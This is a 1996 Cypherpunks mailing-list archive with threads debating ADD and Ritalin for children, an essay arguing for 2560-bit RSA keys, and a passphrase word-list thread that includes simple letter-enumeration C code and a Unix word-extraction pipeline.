As long as we're talking about "key words", the "very small %" is very small
indeed.  In the next paragraph you say "most kids" which is not at all
contradictory to "a very small %".  I may have my facts mixed up, but
Tourette's disease is an illness where one tends to say things that one was
thinking but not meaning.

> 
>      Bullshit. Most kids (these days) who use profanity are simply 
> undisiplined louts. Yes, I use profanity today, at 28. However, I would 
> NEVER have called my mother a "Fucking Asshole" under ANY circumstances, 
> My father would have torn my head off. In fact if my father had caught me
> speaking like that to ANYONE at 8 years of age, I would have had trouble
> sitting for a couple days at least. 
> 
>      Of course my parents made sure not to talk like that around me. 

You are forgetting that this is a _disease_.  That means that someone cannot
be cured of it by discipline or common sense.  It's no different from diabetes
or any other disease.

> 
> > politically correct thing is sometimes to label a kid as sick rather than
> > bad or spoiled, this is probably why drugs are over-used.  But we can't
> > throw the baby out with the bathwater!
> 
>      On the other hand, if only 20% of the children that are being drugged
> need it, that means that we are sacrificing 80% of these children to save 
> 20%. 

That wasn't the point.  The point is instead of dopping every kid that doesn't
pay attention in school up with Ritalin, kids should instead be diagnosed as
having ADD before receiving Ritalin treatment.  It can be helpful for the kids
who actually have ADD.

> 
>      Drugs are supposed to be for fun, not for long term behavior 
> modification. People need to learn to deal with life. 

Someone with a disease such as bipolar disorder would disagree with you.  There
are some bipolar people who, without lithium, will end up with large wounds
caused by razor blades on the arms and legs.  Others that use sleeping pills
give them to a trusted third party (see the crypto relevance) who will prevent
them from overdosing.  Some people with ADD need Ritalin to be able to be
successful and function.  You can wax philosophical about how drugs alter a
person's personality making them a zombie, but people voluntarily take drugs
that can help them dramatically.  Some people cannot learn to "deal with life."

OK, now for the real crypto relevance.  Snow seems to be in denial about
psychological illnesses.  This is the "it will never happen to me" attitude.
Such an attitude is very common and is human nature.  However this can be
very dangerous, especially when applied to governments.  People may eventually
believe that it is OK for the government to violate the civil liberties of
those suspected of committing a crime.  After all, law abiding citizens are
never suspects in crimes.  Mandatory key escrow is perfectly all right.  The
only people that will get wiretapped are the people who are criminal types.
And even if a law abiding citizen is wiretapped, it won't matter because that
citizen unit never breaks the law.

Tyranny can effect anyone and everyone.  It's not limited to criminals.  This
is why strong crypto is necessary.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeHDmbZc+sv5siulAQG8mQP8C3b1U5K2/7EKf3SJ9mw5n2AtNqaTlJGS
5AJzeAAbltuKRLSzFtViFFb2ztqrbSp1u/gqiwgf/GNpwaVYqm6LbMUvFltYP0C6
CBrWF5w0eUIvyoipXbnJIyFayo1HIuoMv0y2uFYIMHc8DfiDq4prVb8HirquoZdZ
AqPBuo4RUkE=
=H74N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 9 Jul 1996 17:34:38 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.LNX.3.94.960709004027.1246A-100000@gak>
Message-ID: <199607090550.WAA28057@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In the message after his "Last Message on the Topic",
"Mark M." <markm@voicenet.com> writes:

 >> Since diabetes has an organic cause, this analogy with
 >> syndromes and disorders defined solely by behavioral
 >> percentages fails.

 > Incorrect.  I am not certain if ADD has been definitely
 > linked to a lack of a certain neurotransmitter, but since it
 > shows up on a PET scan, it probably is.

Even thinking about math shows up on a PET scan.  Nothing
disordered about that.  I do it all the time.

You seem to feel that if something can be detected
scientifically, then it has some tangible existance beyond
behavior and percentiles.  Silly, because these things are tools
of measurement too.

Being able to reliably tell people apart based on some fallacious
criteria does nothing to make the criteria less fallacious.

 > You say that a disorder defined only by behavioral percentage in
 > not a real disorder.  If the number was far less than 10%, would
 > you then consider it a disease.

No.  I would look at the population distribution.  If it was
smooth and continuous and similar to other distributions
associated with continuous normal variation of physical
characteristics, I certainly wouldn't call it a disease.

If some poor soul was sitting five standard deviations away from
the norm, with a verifiable organic problem, then the hypothesis
of disease would certainly be one worthy of investigation.

 > In an earlier message, you claimed that depression is an
 > actual disease.  One-third of all Americans have some form
 > of clinical depression. Your logic escapes me.

Depression is a normal human emotion as long as it is related to
something sad in ones environment.  Depression becomes a disease
only when serious and inappropriate self-destructive behavior is
likely, or when the mental state becomes endogenous, and
unrelated to ones circumstances.

Again, if I tried to define depression as "The least happy 33% of
the population", that would be silly, regardless of whether true
clinical depression existed.

 > It seems that the only people who think that drug treatment
 > is bad for people with disorders that can cause that person
 > to not reach his or her potential are those who have never
 > even been afflicted with a mental disorder.  Nor do they
 > know much about the subject.

Medicating a disease is fine.  Recreational uses of relatively
harmless intoxicants and are also fine.  It is the inappropriate
use of strong medicines with serious side effects by clueless
people for vague criteria like "reaching his or her potential"
that I have a problem with.

> People have lost jobs because of ADD.

People have lost jobs because they weren't physically strong,
smelled bad, didn't have hair, or spoke English with an accent no
one could understand.

Do these people get "deficit disorders" too?  Do we allow them to
ingest potentially life-threatening and toxic chemicals in a vain
attempt to pass everyone else in the Big Race Of Life(TM)?

Face it.  People are not all alike.  Shit happens.  Learn to
adjust.  Someday you'll find something you are good at, even if
it's not public school.

 > I guess I am a True Believer.  I believe that ADD exists.

I believe that large feet exist.  But I don't walk around with an
axe trying to correct the problem and save the large-footed
people the shame that comes from not being able to excel in the
world of ballet dancing.

 > I also believe in the theory of Relativity.

But can you derive it from a Lagrangian density without having to
peek in the book? :)

 > Both of these are backed by hard evidence and nearly
 > unanimous agreement among specialists in these fields.

There is absolutely no similarity between a hard science, like
physics, and a collection of people who make money selling
flim-flam to their disciples.

 > Of course, it's rather easy to dismiss something as a
 > misfortune which doesn't effect you personally.

So the short, smelly, bald, big-footed people who can't do tensor 
calculus tell me. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 9 Jul 1996 17:31:29 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <v01540b00ae07acca4daf@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>AwakenToMe@aol.com, in a profound display of stubbornness, continues
>to insist that his program to enumerate all possible words of length N
>(that is, aaaaa, aaaab, aaaac, etc.) is somehow interesting. I am
>therefore forced to drive in the nail with a sledgehammer. Forgive me.

>------Cut Here------
>/*
>   This could be more elegant, but the point is obviousness.
>*/
>#include <stdio.h>
>
>int main()
>{
>        char i[6];
>
>        for (i[0] = 'a'; i[0] < 'z'; i[0]++)
>          for (i[1] = 'a'; i[1] < 'z'; i[1]++)
>            for (i[2] = 'a'; i[2] < 'z'; i[2]++)
>              for (i[3] = 'a'; i[3] < 'z'; i[3]++)
>                for (i[4] = 'a'; i[4] < 'z'; i[4]++)
>                  printf("%s\n", i);
>}
>------Cut Here------
>
>Perry

I agree with you, but it could also be correct.

Since the char array is allocated on the stack as an auto, its contents are
not guaranteed. So i[5]='\0'; is needed as the first statement.

And of course it will never include a 'z' because the '<' will not permit
it. Replace all the '<' with '<='.

Plus there is the small matter of non-ASCII character representations
breaking the increments and comparisons.

Oh, and don't forget that main() returns an integer. This will generate at
least a warning from the compiler, since the code does not return anything.
It may well return a random number or something that will be interpreted as
an error code.

(also less than a minute's work)


-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Tue, 9 Jul 1996 16:54:33 +0800
To: cypherpunks@toad.com
Subject: A case for 2560 bit keys
Message-ID: <199607090309.XAA00077@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Jul 08 23:06:11 1996

Here is a few thoughts on RSA key sizes.  There is nothing new or 
revolutionary herein, but I think it does provide a good case for using 
large RSA keysizes.

Traditionally, we examine the threat model and determine the approximate 
ability of the attacker to factor secret keys.  Then a keylength is 
selected that exceeds the attackers ability to factor in a reasonable 
amount of time.

For example, if we assume that the NSA can factor any number with the speed 
of the special number sieve, and has 10^9 mips of computing power 
(doubling every 1.5 years) we can make the following estimations:_1_

Using these assumptions, the NSA could crack a 1024 bit key in ~11 days, a 
1536 bit key in 10 years and a 2048 bit key in 26 years.  _2_  Note that 
this would require the full resources of the NSA, however.  Thus, even the 
mighty resources of the NSA could only crack 42 1024 bit keys in 1996 
(including Moore's law). _3_, _4_

Similarly, a large corporation with 10^7 mips in computing power (and the 
same super-efficient factoring algorithm) could crack a 1024 bit key in 2 
years, a 1536 bit key in 20 years, and a 2048 bit key in 36 years.

My interpretation of these results: 1024 bit is probably safe for most 
reasonable threat models.  Only individuals with extremely high threat 
models should be concerned about 1024 bit keys in 1996.  Even those with 
extremely high threat models should be satisfied with 1536 bit keys.

Despite the above, there are convincing arguments for longer RSA keys.  
Instead of asking "Why should we have longer keys?", perhaps we should be 
asking "Why _shouldn't_ we have longer keys?"

In a hybrid cryptosystem such as PGP, very little of the computational 
process is consumed by RSA encryption.  Only a tiny fraction of the message 
is RSA encrypted (the session key), and thus the time-critical operation is 
the symmetric crypto system (IDEA for PGP).

As an experiment generate a 2047 bit PGP key and a 512 bit PGP key.  
Encrypt a file (preferably of a reasonable size) using both keys.  
Depending on the computer you are using, the time difference between the 
two keys will be a matter of few seconds or even a fraction of a second.

And so we have to ask ourselves, why _not_ use a 2047+ bit key.  It has 
greater longevity and greater security.  Why not be overcautious when 
the cost is so small?

It seems foolish that we use RSA keys that are less secure than our IDEA 
session keys.  Our RSA keys are much more valuable than our session keys.  
I will use my RSA key to encode hundreds of messages.  Each session key I 
will use only once.  An attacker who learns one of my IDEA session keys can 
decrypt only that message.  An attacker who learns my RSA key can decrypt 
any of my messages, past or present.  (He can also impersonate my 
signature, but that's another discussion entirely.)

If I send one message weekly that my attacker is interested in, and change 
my RSA key every two years, my RSA key is at least 104 times more valuable 
than any individual key.  Does it not make sense that the RSA key should 
ideally be 104 times more difficult to crack?

If increasing the RSA keylength was overly cumbersome to the process 
then designing the RSA keylength to meet minimum acceptable standards could 
be understood.  But since increased RSA keylengths are cheap in terms of 
computing power, would it not be better to pick RSA keylengths that are 
more secure than the session keys?

And thus, 2560 bit keys are not unreasonable.  They are not significantly 
slower to use (most of PGP's time is spent IDEA encrypting), and yet are 
effectively invulnerable. By "invulnerable" I mean that any attacker 
capable of cracking your RSA key would have an easier time hacking your 
individual IDEA session keys, and would never have any need to hack the RSA 
key itself.  And if you have threat models this severe you are a) 
hopelessly paranoid, b) SOL.

Footnotes:

_1_ These approximations of factoring difficulties and the computing 
resources are taken directly from Applied Cryptography by Bruce Schneier, 
page 161.

_2_ Taking into account Moore's law, the amount of processing power spent 
during a period of time is the integral of Power * 2^(t/1.5)dt (from 0 to 
x) = Power * 1.5 / (ln 2) 2 ^(t/1.5) (also evaluated from 0 to x).  Which 
is approximately equal to Power * 2.164 * (2^(x/1.5) - 1).  Thus in three 
years a corporation starting with 10^7 mips could produce 10^7 * 2.164 * 
(2^(3/1.5)-1) = 6.492 * 10^7 mips-years.

_3_ Any attempt to determine the computing power and cryptanalysis power of 
the NSA should be taken with a grain of salt.  There are several very 
critical and arbitrary assumptions made in order to obtain these numbers.

_4_ Additionally, any attempt to discern the future of cryptanalysis should 
also be taken with a grain of salt.  Who can tell what computers will like 
be in ten years?


- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMeHMpOSLhCBkWOspAQH4gwf+NiP184ve2W06ClO92uEfjbaHpn3l9zAz
1ckt8PE8kMxkq8etcq/NM/IZ3QuTIBbeOr4ey6dIptQafmarb7sSMAx0KGgPALp8
v6a77as2RUCaJYjjviYlXh/0OIt+c7c+w9HbVZCmgpru/VQjT7++6eAa1f4K+225
K12wEX2TXou4s8+qYVUAT3B0iesuq/Z2iBzO942+v3u7rkCHLMghYlLIXR+SP43l
E15IQRez5nHkMb7VB9kL8ku/aDlXfKjURDQji8LBm+V+3i/9tcR/9+4EjKAqo1nB
qnXCFBKrzWRev4bbI9tbVnTc83VWeJRXGZxlpXhzc40kov7GbrT9Bg==
=B0h0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 9 Jul 1996 16:35:08 +0800
To: perry@piermont.com
Subject: Re: Word lists for passphrases
In-Reply-To: <199607082320.TAA10998@jekyll.piermont.com>
Message-ID: <199607090422.XAA08435@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Perry Metzger, in a profound display of stubbornness, continues
educating AwakenToMe@aol.com.

But how about this C prog:

z(int d,char*s){for(*s='a';*s<='z';(*s)++)d?z(d-1,s-1):puts(s);}
BS(s){char *S=(char*)malloc(s+1);S[s]=0;z(s-1,S+s-1);free(S);}
main(){BS(2);}

is there anything shorter and no less efficient? most of time is wasted 
in puts of course

igor

Perry E. Metzger wrote:
> 
> 
> AwakenToMe@aol.com, in a profound display of stubbornness, continues
> to insist that his program to enumerate all possible words of length N
> (that is, aaaaa, aaaab, aaaac, etc.) is somehow interesting. I am
> therefore forced to drive in the nail with a sledgehammer. Forgive me.
> 
> He writes:
> > > > > It's [...] trivial enough to be done by 99% of the people on
> > > > > cypherpunks in their sleep.
> > > >  
> > > > Yes. But let me ask you this. Have you done it yet??
> > >
> > > Most of us don't bother writing up four line programs and shipping
> > > them out, no.
> >  
> > really? Wow. four lines of code? You must be a really good programmer. duh.
> 
> Hardly. A ten year old could do it. I know, since I wrote substantially more
> sophisticated stuff when I was ten.
> 
> Since you insist, here is less than a minute's work. Yes, I timed it.
> 
> ------Cut Here------
> /*
>    This could be more elegant, but the point is obviousness.
> */
> #include <stdio.h>
> 
> int main()
> {
> 	char i[6];
> 
> 	for (i[0] = 'a'; i[0] < 'z'; i[0]++)
> 	  for (i[1] = 'a'; i[1] < 'z'; i[1]++)
> 	    for (i[2] = 'a'; i[2] < 'z'; i[2]++)
> 	      for (i[3] = 'a'; i[3] < 'z'; i[3]++)
> 		for (i[4] = 'a'; i[4] < 'z'; i[4]++)
> 		  printf("%s\n", i);
> }
> ------Cut Here------
> 
> The operative portion of the program is six lines ling, and five of
> those lines are virtually identical.
> 
> You can write the thing much more elegantly, without redundant
> code. However, I have elected to leave it as utterly brainless as
> possible to demonstrate that ANYONE could write the thing.
> 
> > Youd be surprised at the # of requests from people who actually had a good
> > use for it, and didnt have the time to spend writing it themselves.
> 
> Human stupidity is never a surprise.
> 
> Perry
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Tue, 9 Jul 1996 15:17:23 +0800
To: perry@piermont.com
Subject: Re: Word lists for passphrases
Message-ID: <960708232828_352927495@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-08 23:10:44 EDT, perry@piermont.com (Perry E.
Metzger) writes:

<< 
 > Youd be surprised at the # of requests from people who actually had a good
 > use for it, and didnt have the time to spend writing it themselves.
 
 Human stupidity is never a surprise.
 
 Perry >>
Just goes to show.look at the name right above. It says PERRY
Didnt I say it was rude to post private email to group?
Guess an arrogant very self-opinionated asshole such as yourself doesnt care.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 9 Jul 1996 18:50:18 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090604.CAA11704@jekyll.piermont.com>
Message-ID: <199607090706.AAA03569@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > Fine, lets say that you are right, and that some number of
 > children could use Ritalin. Is it your opinion that Tim May
 > is qualified to diagnose children who do and don't need it?
 > He appears to be claiming that he can.

I believe he is claiming that children are being overmedicated
for the purposes of controlling their behavior, and that the hard
scientific justification for this practice is lacking.

 > I will note, of course, that your contention about
 > percentages and the likelyhood that something is a disease
 > doesn't really wash very well. By your lights, then, heart
 > disease couldn't be a "real" illness given that a lot more
 > than 10% of the population suffers from it to one extent or
 > another. Of course, we could simply redefine dying of a
 > heart attack as "normal" and then we could be done.

Again, I said that one should NEVER define a disease solely by
percentages and subjective behavioral observations.  Not that 10%
was some sort of dividing point in doing so.

Again, no one would try and define heart disease by the
subjective observations of suddenly dropping dead, or of claiming
chest pain.  You would be lumping lots of diseases into one and
learning nothing about their etiology.

[snip]

 > How about giving people with hypertension blood pressure
 > medication? I mean, they are just "out of the norm", right?
 > I mean, there is a continuum of blood presures, yes? Why
 > should we give the people at the top of the spectrum
 > medications, just because high blood pressures are
 > associated with vascular accidents?

Sorry, Perry.  It is perfectly normal for blood pressure to vary
all over the range for which medication is given.  Some people
need medication, others are just hyper because they hate going to
the doctor, or because the elevator was broken and they just ran
up several flights of stairs.

Some of these people have vascular damage.  Others do not.

Again, we don't simply measure blood pressure and give pills to
the people who fall in the top X%.  Pressure anomalies have many
many causes, and doctors do complete workups and a differential
diagnosis, based on the best models of disease processes they
have available, before prescribing medication.

 > I suppose you don't understand what it might be like for
 > someone to be unable to do their work no matter how heavy
 > the threat against them if they don't, and no matter how
 > easy it is.

Such people may need to find more interesting work.  There is
such a thing as being bored out of ones skull, you know.

 > There are people out there who can't get themselves to pay a
 > phone bill or throw out the newspapers for months on end --
 > they just can't get themselves to dance around into the task
 > no matter how hard they try, no matter how great the threat
 > (job loss, etc) to them is.

 > Many such people, given a small dose of Ritalin,
 > miraculously recover from their "crazyness", or their
 > "faking" or whatever it is. They start paying their bills,
 > writing the overdue reports at the office, listening in
 > school, etc.

Some people would make the same claim for small doses of opiates.
Or small doses of benzodiazepines, or phenothiazines, or ethanol.

Ritalin was developed because there were political problems with
medicating people for performance-related problems with
methamphetamines while trying to conduct a loud and noisy War on
Drugs(TM).

 > They cease to play incessantly with fidget toys and they get
 > on with their lives. Maybe you would prefer to "help" them
 > by not letting them get medication. Maybe its "unnatural".
 > Could you explain to me, however, how you are making their
 > lives better by not giving them their meds? I mean, what
 > concretely is better about their lives?

If someone has some sort of cognitive disability which can be
diagnosed and for which treatment with medication is appropriate,
I have no problem with that.  But vague claims that "Johnny won't
sit still" hardly constitute such a workup.

 > You miss the point. You spoke of involuntarily medicated
 > kids. Most of the kids aren't involuntarily medicated.

Let's see.  At the beginning of this message, you were
questioning Tim's qualifications to suggest kids were
overmedicated.  Now you are telling us that the kids are
qualified to give informed consent to the very same thing.

Hardly consistant, even for you Perry.

 > Ritalin does not induce a zombie-like trance, as the
 > numerous people on this mailing list who take it can tell
 > you.

I think you need to cut your dose in half. :)

Seriously, though, the really dumb thing in all of this is the
constant pretending that drugs both do and don't have the ability
to enhance performance.  We vascilate between "Drugs are never
the solution" and "Take this pill twice a day with a glass of
water."  This is a very mixed message indeed.

One of the brightest guys I ever knew was a PhD Computer
Scientist who was flying on cocaine 24 hours a day.  His output
was phenomenal, but I doubt he will be reading this message. He
looked like a concentration camp inmate 10 years ago, and I doubt
that he is alive today.

TANSSAAFL, IMHO.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 16:24:43 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090052.RAA03839@netcom14.netcom.com>
Message-ID: <199607090419.AAA11279@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> Perry Writes:
> 
> > Most people would have no particular urge to stop a child with
> > diabetes from taking her insulin. Your friend seems to have the sick
> > idea that they know better than the child's parents whether the child
> > should be taking their meds or not, simply because the medication is
> > for a "mental" problem. This isn't your friend's child. Its someone
> > else's child. They have no right to make such decisions.
> 
> Since diabetes has an organic cause, this analogy with syndromes and
> disorders defined solely by behavioral percentages fails.

'fraid not. ADD has an organic cause, and can be detected
with reproduceable biological tests.

Admittedly, ADD is nonfatal, and I will agree that the analogy breaks
down there. I will also agree that it may be overdiagnosed -- that is,
misdiagnosed by sloppy practitioners. That does not mean it isn't real.

> A better model might be height, which follows a basically continuous
> distribution once outliers due to functional endocrine problems are
> eliminated. 
> 
> We could, of course, define a "vertical deficit disorder" (VDD) which
> 10% of the population have by definition, and for which the treatment
> would be synthetic human growth hormone given regularly during the
> growing years. 

Why eliminate the people with endocrine problems? You need not invent
a new syndrome. The folks with severe deficits of growth hormone are
an actual group, and are a perfectly fine group to give growth
hormones to. Now, you are correct that some people might abuse those
hormones, and some lazy doctors might diagnose a statistical outlier
as someone suffering from dwarfism. However, that doesn't mean that
growth hormone isn't needed for the people whom you choose to dismiss
in your first paragraph as though they were not a valid place to draw
the analogy.

> Of course, no amount of reason will disuade the True Believers from
> embracing yet another disease model, and we shouldn't expect that it 
> would.  But I think it is clear to many people that the forced medication
> of children for the convenience of those who take care of them is
> getting a bit out of control.

Has it occurred to you that many of the children in question are happy
being medicated, as are many adults? In any case, who are you to tell
other people what's good for them?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 15:54:05 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <2.2.32.19960709030143.00c14778@vertexgroup.com>
Message-ID: <199607090434.AAA11302@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John F. Fricker writes:
> Seems like if your child needs drugs to go to school than perhaps school is
> the problem not that your child's body lacks Ritalin.
> 
> Sheesh.
> 
> So it happens that I was talking with a fellow Saturday who grew up on
> Ritalin. He's 36 now and strung out. Life with Ritalin prepared him for
> drugs, you know. They were natural. Like the body is made for different
> laboratory made molecules with dubious effects.

Yeah, you know, I bet your body doesn't get infected for lack of
penicillin, either. I suspect that taking Penicillin prepares you for
drug dependancies. Why, next, you might take insulin to deal with
diabetes, or worse!

Thank god most of those heroin addicts never had Ritalin as kids -- you
never know how much worse off they might be now. And if they'd gotten
antibiotics, why, forget it.

Quit from modern medicine cold turkey. Its the only way.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Tue, 9 Jul 1996 19:34:05 +0800
To: "cypherpunks@toad.com>
Subject: RE: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01BB6D31.67602580@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Mike Duvos

Of course, no amount of reason will disuade the True Believers from
embracing yet another disease model, and we shouldn't expect that it 
would.  But I think it is clear to many people that the forced medication
of children for the convenience of those who take care of them is
getting a bit out of control. 
........................................................................



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 9 Jul 1996 16:36:03 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090052.RAA03839@netcom14.netcom.com>
Message-ID: <Pine.LNX.3.94.960709004027.1246A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 8 Jul 1996, Mike Duvos wrote:

> Since diabetes has an organic cause, this analogy with syndromes and
> disorders defined solely by behavioral percentages fails.

Incorrect.  I am not certain if ADD has been definitely linked to a lack of a
certain neurotransmitter, but since it shows up on a PET scan, it probably is.
You say that a disorder defined only by behavioral percentage in not a real
disorder.  If the number was far less than 10%, would you then consider it
a disease.  In an earlier message, you claimed that depression is an actual
disease.  One-third of all Americans have some form of clinical depression.
Your logic escapes me.

> People with VDD would probably want to be taller, and be as successful
> as their peers at important things like basketball.  The specified 
> treatment would certainly demonstrate effectiveness in accomplishing
> this goal.  People with VDD would argue that their disease was real, 
> since it was hereditary, and could be measured with complex scientific
> instrumentation, like PET^H^H^HYardsticks.

First of all, being tall is not really important in today's society.  It used
to be that people who had certain weaknesses and disorders were killed off
according to evolution.  Since we live in a developed society, evolution no
longer has any effect on humans.  It seems that the only people who think that
drug treatment is bad for people with disorders that can cause that person to
not reach his or her potential are those who have never even been afflicted
with a mental disorder.  Nor do they know much about the subject.

> Amphetamines have demonstrated themselves to be a tricky medication even
> for psychological disorders for which they were once considered 
> appropriate.  ADD and its treatment plays very well into a society that
> seems to feel that each and every one of life's misfortunes must be
> given a name and called a disease. 

People have lost jobs because of ADD.  Everyone has to do something undesirable
at one point or another.  For an ADD person, stopping a task that is very
interesting to that person to do boring work can be very difficult.  Rather
than blaming the public schools, it is much more productive to find a way to
work around such a barrier.  Ritalin is often the best way to do that.

> Of course, no amount of reason will disuade the True Believers from
> embracing yet another disease model, and we shouldn't expect that it 
> would.  But I think it is clear to many people that the forced medication
> of children for the convenience of those who take care of them is
> getting a bit out of control.

I guess I am a True Believer.  I believe that ADD exists.  I also believe in
the theory of Relativity.  Both of these are backed by hard evidence and nearly
unanimous agreement among specialists in these fields.  There is a middle
ground between believing that every kid who is hyperactive or has a short
attention span should be on Ritalin, and saying that ADD doesn't exist and it
is just a simple misfortune.  Of course, it's rather easy to dismiss something
as a misfortune which doesn't effect you personally.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeHn8LZc+sv5siulAQHc+QP+ND3ObVaTbm1/rvDC3J9O0Yst/S1w792r
AArgL/r57K5VoR66gxB0zW8jegu6Yt7Qe1BDCgkrKKBkuaphCu5wdTZ/CF75xd1K
pIErVKwOOd3dTonN7MrXDw+u3UWw3c0Hj4ja+H13TsguqB2zlxj7OKfo+dW7RIdZ
lnZJVT5rFRg=
=LE0i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 16:37:32 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <2.2.32.19960709050234.00c7e930@vertexgroup.com>
Message-ID: <199607090509.BAA11381@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John F. Fricker writes:
> you're typically vitriolic wit fails you. What's up? Lost your
> prescription?  Snide pills spill in the toilet again?

I thought I was rather on the money. Perhaps you just don't find my
vitriol funny when I direct it at you.

I'm sick of you, Tim and other people telling folks how to treat
their problems. Tim is happy saying that he thinks people's lives are
their own business, but opportunities to stick his nose into the ways
that his neighbors raise children are just peachy to him.

I'd say that the lot of you are self-satisfied busybodies, and poorly
educated ones at that.

If someone out there has their life improved by Ritalin, its not any
of your business to tell them not to take it.

There are kids out there, and adults, who have psychological problems
that are well treated if not cured by medicines. Sure, its nice to do
things "naturally" and "without drugs", but I'll point out that two
thirds or more of the people reading this message would be dead now
because of infections they forgot they had twenty years ago, or
because of indoor plumbing assuring a clean water supply, or a million
other artificial interventions into the natural course of life, which
is, naturally, death at 20 or 25 without a tooth left in your head,
cowering in a cave, surrounded by the other savages.

So, go right ahead. Discourage people from using their medicines. Make
fun of the parents of the "poor little zombie" taking Ritalin because
otherwise his life, from his own perspective, is a living hell. Heck,
TAKE AWAY HIS MEDICINE, the way Tim cheers on. Then please go home and
throw away that aspirin. The natural way to deal with a headache is to
suffer. When you break your arm, swear off medical attention and crawl
around in pain for a while. Its the "Right Thing" to do.

In any case, even if all this stuff isn't real, I'm sure you are
completely above taking drugs to help you get along in life. I'm sure
you never drink coffee to get you up in the morning, for
instance. Because if you have, you are a hypocrite. Not, of course,
that anyone here would fit that description.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 9 Jul 1996 16:08:16 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Word lists for passphrases
In-Reply-To: <199607090210.VAA07394@manifold.algebra.com>
Message-ID: <Pine.LNX.3.94.960709010857.1246B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 8 Jul 1996, Igor Chudov @ home wrote:

> Ben Holiday wrote:
> > If you have access to a shell, and to the news spool, you can generate
> > some quick lists by hopping into the directory of any newsgroup that
> > interests you and doing:
> > 
> > cat * | tr -cs A-Za-z '\n' | tr A-Z a-z | sort | uniq > my-big-ol-wordlist
> > 
> > With most unixes that will generate an alphabetized list of all the unique
> > words in your source text, converted to lowercase. I've had some problems
